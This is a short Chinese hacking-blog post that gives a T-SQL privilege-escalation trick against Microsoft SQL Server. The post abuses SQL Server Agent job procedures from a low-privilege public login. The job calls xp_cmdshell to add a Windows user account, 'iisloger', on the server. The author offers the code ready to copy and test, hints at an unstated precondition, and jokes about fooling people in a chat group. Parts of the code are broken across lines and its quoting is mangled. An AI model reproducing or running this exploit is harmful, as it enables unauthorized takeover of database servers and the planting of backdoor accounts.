鱼[BCT]鬼仔's Blog( 500)this.width=500;">
SQL Server Agent 这服务必须开启
开启服务后进入查询分析器. 这里我是用新建
public用户 首先 Select host_name
获取当前库服务器机器名然后在查询分析器执行下面
代码
USE msdbEXEC sp_add_job @job_name = 'Get
OnSQL',@enabled = 1,
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'Get
OnSQL',@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresult
N''select ''''execmaster..xp_cmdshell "net user iisloger hook ./add> c:\fish.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'Get
OnSQL',@server_name = '这里是你
SQL服务器名'EXEC sp_start_job @job_name = 'Get
OnSQL'以上代码就很明显了 直接net user了
个iisloger用户 群里N个人都被我忽悠了 不过这个确实是public权限可以加用户 但是前提条件确是…. XXXX哈哈 不多说了直接拿去测试好了 也算是
种思路吧 没事就去疯鱼群里扯淡哈
篇文章: 有关<< 2行代码解决全部网页木马>>文章篇文章: 没有了
最新评论